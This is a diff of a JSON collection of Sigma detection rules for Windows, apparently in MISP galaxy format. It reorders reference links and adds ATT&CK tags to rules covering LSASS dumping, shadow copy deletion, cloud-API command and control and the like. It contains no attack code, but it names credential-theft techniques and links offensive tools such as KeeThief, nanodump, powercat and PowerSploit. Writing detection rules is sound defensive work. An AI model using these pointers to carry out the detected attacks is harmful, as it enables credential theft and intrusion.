"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md", "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_persistence.yml" ], "tags": [ @@ -33759,8 +34172,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", "https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy_deletion.yml" ], "tags": [ @@ -33967,8 +34380,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1020/T1020.md", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.2", "https://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_script_with_upload_capabilities.yml" ], "tags": [ @@ -34200,9 +34613,9 @@ "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ + "https://github.com/denandz/KeeFarce", "https://github.com/GhostPack/KeeThief", "https://www.cisa.gov/uscert/ncas/alerts/aa20-259a", - "https://github.com/denandz/KeeFarce", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_keepass.yml" ], "tags": [ @@ -34268,8 +34681,8 @@ "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ - "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/", "https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f", + "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_hktl_cobaltstrike.yml" ], "tags": [ @@ -34636,11 +35049,11 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://github.com/fengjixuchui/gdrv-loader", - "https://twitter.com/malmoeb/status/1551449425842786306", "https://www.virustotal.com/gui/file/cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b/details", - "https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b", + "https://twitter.com/malmoeb/status/1551449425842786306", "https://www.virustotal.com/gui/file/31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427/details", + "https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b", + "https://github.com/fengjixuchui/gdrv-loader", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_gigabyte_driver.yml" ], "tags": [ @@ -34706,8 +35119,8 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://github.com/winsiderss/systeminformer", "https://systeminformer.sourceforge.io/", + "https://github.com/winsiderss/systeminformer", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_pua_system_informer.yml" ], "tags": [ @@ -34815,8 +35228,8 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://github.com/xmrig/xmrig/tree/master/bin/WinRing0", "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", + "https://github.com/xmrig/xmrig/tree/master/bin/WinRing0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_winring0_driver.yml" ], "tags": [ @@ -35349,8 +35762,8 @@ "logsource.product": "windows", "refs": [ "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", - "https://content.fireeye.com/apt-41/rpt-apt41", "https://blog.bushidotoken.net/2021/04/dead-drop-resolvers-espionage-inspired.html", + "https://content.fireeye.com/apt-41/rpt-apt41", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dead_drop_resolvers.yml" ], "tags": [ @@ -35676,8 +36089,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling", "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", + "https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_to_http.yml" ], "tags": [ @@ -35790,11 +36203,11 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://twitter.com/M_haggis/status/900741347035889665", "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", + "https://twitter.com/M_haggis/status/1032799638213066752", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1", - "https://twitter.com/M_haggis/status/1032799638213066752", + "https://twitter.com/M_haggis/status/900741347035889665", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_susp_com.yml" ], "tags": [ @@ -36053,11 +36466,11 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://services.google.com/fh/files/blogs/gcat_threathorizons_full_apr2023.pdf", - "https://www.bleepingcomputer.com/news/security/hackers-abuse-google-command-and-control-red-team-tool-in-attacks/", - "https://youtu.be/n2dFlSaBBKo", "https://github.com/looCiprian/GC2-sheet", + "https://www.bleepingcomputer.com/news/security/hackers-abuse-google-command-and-control-red-team-tool-in-attacks/", "https://www.tanium.com/blog/apt41-deploys-google-gc2-for-attacks-cyber-threat-intelligence-roundup/", + "https://services.google.com/fh/files/blogs/gcat_threathorizons_full_apr2023.pdf", + "https://youtu.be/n2dFlSaBBKo", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_google_api_non_browser_access.yml" ], "tags": [ @@ -36308,8 +36721,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://twitter.com/kleiton0x7e/status/1600567316810551296", "https://www.linkedin.com/posts/kleiton-kurti_github-kleiton0x00redditc2-abusing-reddit-activity-7009939662462984192-5DbI/?originalSubdomain=al", + "https://twitter.com/kleiton0x7e/status/1600567316810551296", "https://github.com/kleiton0x00/RedditC2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_reddit_api_non_browser_access.yml" ], @@ -36343,8 +36756,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://github.com/mttaggart/OffensiveNotion", "https://medium.com/@huskyhacks.mk/we-put-a-c2-in-your-notetaking-app-offensivenotion-3e933bace332", + "https://github.com/mttaggart/OffensiveNotion", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_notion_api_susp_communication.yml" ], "tags": [ @@ -36377,8 +36790,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download", "https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_imewdbld.yml" ], "tags": [ @@ -36411,8 +36824,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", "https://redcanary.com/blog/child-processes/", + "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dllhost_net_connections.yml" ], "tags": [ @@ -36521,10 +36934,10 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-302a", - "https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html", "https://github.com/rsp/scripts/blob/c8bb272d68164a9836e4f273d8f924927f39b8c6/externalip-benchmark.md", + "https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html", + "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_external_ip_lookup.yml" ], "tags": [ @@ -36557,12 +36970,24 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb", "https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east", + "https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_dropbox_api.yml" ], - "tags": "No established tags" + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "25eabf56-22f0-4915-a1ed-056b8dae0a68", "value": "Suspicious Dropbox API Usage" }, @@ -36579,8 +37004,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://www.mandiant.com/resources/russian-targeting-gov-business", "https://megatools.megous.com/", + "https://www.mandiant.com/resources/russian-targeting-gov-business", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_mega_nz.yml" ], "tags": [ @@ -36660,6 +37085,44 @@ "uuid": "07a99744-56ac-40d2-97b7-2095967b0e03", "value": "Potential Privilege Escalation Attempt Via .Exe.Local Technique" }, + { + "description": "Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.", + "meta": { + "author": "Florian Roth (Nextron Systems)", + "creation_date": "2021/11/15", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_lsass_default_dump_file_names.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/CCob/MirrorDump", + "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/", + "https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf", + "https://github.com/helpsystems/nanodump", + "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml", + "https://www.google.com/search?q=procdump+lsass", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_default_dump_file_names.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "a5a2d357-1ab8-4675-a967-ef9990a59391", + "value": "LSASS Process Memory Dump Files" + }, { "description": "Detects creation of \".vhd\"/\".vhdx\" files by browser processes.\nMalware can use mountable Virtual Hard Disk \".vhd\" files to encapsulate payloads and evade security controls.\n", "meta": { @@ -36673,9 +37136,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/", - "https://redcanary.com/blog/intelligence-insights-october-2021/", "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/", + "https://redcanary.com/blog/intelligence-insights-october-2021/", + "https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_vhd_download_via_browsers.yml" ], "tags": [ @@ -36732,8 +37195,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://adsecurity.org/?p=2398", "https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/", + "https://adsecurity.org/?p=2398", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit_uncommon_process.yml" ], "tags": [ @@ -36774,10 +37237,10 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/cube0x0/status/1418920190759378944", - "https://github.com/WiredPulse/Invoke-HiveNightmare", "https://github.com/FireFart/hivenightmare/", + "https://github.com/WiredPulse/Invoke-HiveNightmare", "https://github.com/GossiTheDog/HiveNightmare", + "https://twitter.com/cube0x0/status/1418920190759378944", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_hivenightmare_file_exports.yml" ], "tags": [ @@ -36811,8 +37274,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3", "Internal Research", + "https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_module_creation.yml" ], "tags": [ @@ -36835,9 +37298,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/", - "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/", "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53", + "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/", + "https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_outlook_susp_macro_creation.yml" ], "tags": [ @@ -36887,11 +37350,11 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/luc4m/status/1073181154126254080", - "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", "https://twitter.com/malwrhunterteam/status/1235135745611960321", - "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", + "https://twitter.com/luc4m/status/1073181154126254080", "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", + "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml" ], "tags": [ @@ -36957,8 +37420,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy", "https://twitter.com/0gtweet/status/1465282548494487554", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_nppspy.yml" ], "tags": [ @@ -37058,44 +37521,6 @@ "uuid": "3da70954-0f2c-4103-adff-b7440368f50e", "value": "Suspicious PROCEXP152.sys File Created In TMP" }, - { - "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", - "meta": { - "author": "Florian Roth (Nextron Systems)", - "creation_date": "2021/11/15", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_lsass_dump.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/CCob/MirrorDump", - "https://github.com/helpsystems/nanodump", - "https://www.google.com/search?q=procdump+lsass", - "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml", - "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/", - "https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_dump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ] - }, - "related": [ - { - "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - } - ], - "uuid": "a5a2d357-1ab8-4675-a967-ef9990a59391", - "value": "LSASS Process Memory Dump Files" - }, { "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", "meta": { @@ -37168,12 +37593,12 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/", "https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/", - "https://labs.withsecure.com/publications/detecting-onenote-abuse", - "https://twitter.com/MaD_c4t/status/1623414582382567424", "https://app.any.run/tasks/17f2d378-6d11-4d6f-8340-954b04f35e83/", + "https://labs.withsecure.com/publications/detecting-onenote-abuse", + "https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/", "https://www.trustedsec.com/blog/new-attacks-old-tricks-how-onenote-malware-is-evolving/", + "https://twitter.com/MaD_c4t/status/1623414582382567424", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_onenote_susp_dropped_files.yml" ], "tags": [ @@ -37196,10 +37621,10 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", - "https://pentestlab.blog/tag/ntds-dit/", + "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", + "https://pentestlab.blog/tag/ntds-dit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit_uncommon_parent_process.yml" ], "tags": [ @@ -37310,11 +37735,11 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/luc4m/status/1073181154126254080", - "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", "https://twitter.com/malwrhunterteam/status/1235135745611960321", - "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", + "https://twitter.com/luc4m/status/1073181154126254080", "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", + "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_double_extension.yml" ], "tags": [ @@ -37380,10 +37805,10 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer", - "https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks", "https://github.com/Yaxser/Backstab", + "https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks", "https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/", + "https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_procexp_driver_susp_creation.yml" ], "tags": [ @@ -37483,8 +37908,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py", "https://github.com/Porchetta-Industries/CrackMapExec", + "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_remote_cred_dump.yml" ], "tags": [ @@ -37520,8 +37945,20 @@ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml" ], - "tags": "No established tags" + "tags": [ + "attack.execution", + "attack.t1059" + ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", "value": "Windows Shell/Scripting Application File Write to Suspicious Folder" }, @@ -37541,8 +37978,28 @@ "WScript or CScript Dropper (cea72823-df4d-4567-950c-0b579eaf0846)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cscript_wscript_dropper.yml" ], - "tags": "No established tags" + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ] }, + "related": [ + { + "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "002bdb95-0cf1-46a6-9e08-d38c128a6127", "value": "WScript or CScript Dropper - File" }, @@ -37559,8 +38016,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence", "Internal Research", + "https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence", "https://github.com/redcanaryco/atomic-red-team/blob/4ae9580a1a8772db87a1b6cdb0d03e5af231e966/atomics/T1137.006/T1137.006.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_addin_persistence.yml" ], @@ -37627,9 +38084,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://answers.microsoft.com/en-us/msoffice/forum/all/document-in-word-startup-folder-doesnt-open-when/44ab0932-2917-4150-8cdc-2f2cf39e86f3", - "https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/", "https://en.wikipedia.org/wiki/List_of_Microsoft_Office_filename_extensions", + "https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/", + "https://answers.microsoft.com/en-us/msoffice/forum/all/document-in-word-startup-folder-doesnt-open-when/44ab0932-2917-4150-8cdc-2f2cf39e86f3", "http://addbalance.com/word/startup.htm", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_uncommon_file_startup.yml" ], @@ -37686,8 +38143,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae", "https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/", + "https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_executable_creation.yml" ], "tags": [ @@ -37762,9 +38219,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/hhlxf/PrintNightmare", "https://github.com/cube0x0/CVE-2021-1675", "https://github.com/afwu/PrintNightmare", + "https://github.com/hhlxf/PrintNightmare", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_1675_printspooler.yml" ], "tags": [ @@ -37848,10 +38305,10 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/office/vba/outlook/concepts/outlook-forms/create-an-outlook-form", - "https://www.slipstick.com/developer/custom-form/clean-outlooks-forms-cache/", - "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=79", "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=76", + "https://learn.microsoft.com/en-us/office/vba/outlook/concepts/outlook-forms/create-an-outlook-form", + "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=79", + "https://www.slipstick.com/developer/custom-form/clean-outlooks-forms-cache/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_outlook_newform.yml" ], "tags": [ @@ -37963,8 +38420,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c", "https://persistence-info.github.io/Data/wpbbin.html", + "https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wpbbin_persistence.yml" ], "tags": [ @@ -38287,11 +38744,11 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", - "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", - "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", - "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", + "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", + "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml" ], "tags": [ @@ -38358,26 +38815,26 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/HarmJ0y/DAMP", - "https://github.com/CsEnox/EventViewer-UACBypass", - "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", - "https://github.com/adrecon/ADRecon", - "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", - "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", - "https://github.com/NetSPI/PowerUpSQL", - "https://github.com/nettitude/Invoke-PowerThIEf", - "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", - "https://github.com/AlsidOfficial/WSUSpendu/", - "https://github.com/samratashok/nishang", - "https://github.com/PowerShellMafia/PowerSploit", - "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", - "https://github.com/besimorhino/powercat", - "https://github.com/S3cur3Th1sSh1t/WinPwn", - "https://github.com/DarkCoderSc/PowerRunAsSystem/", - "https://github.com/adrecon/AzureADRecon", "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://github.com/S3cur3Th1sSh1t/WinPwn", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/adrecon/ADRecon", + "https://github.com/samratashok/nishang", "https://github.com/Kevin-Robertson/Powermad", + "https://github.com/HarmJ0y/DAMP", + "https://github.com/DarkCoderSc/PowerRunAsSystem/", + "https://github.com/CsEnox/EventViewer-UACBypass", + "https://github.com/nettitude/Invoke-PowerThIEf", + "https://github.com/AlsidOfficial/WSUSpendu/", + "https://github.com/besimorhino/powercat", + 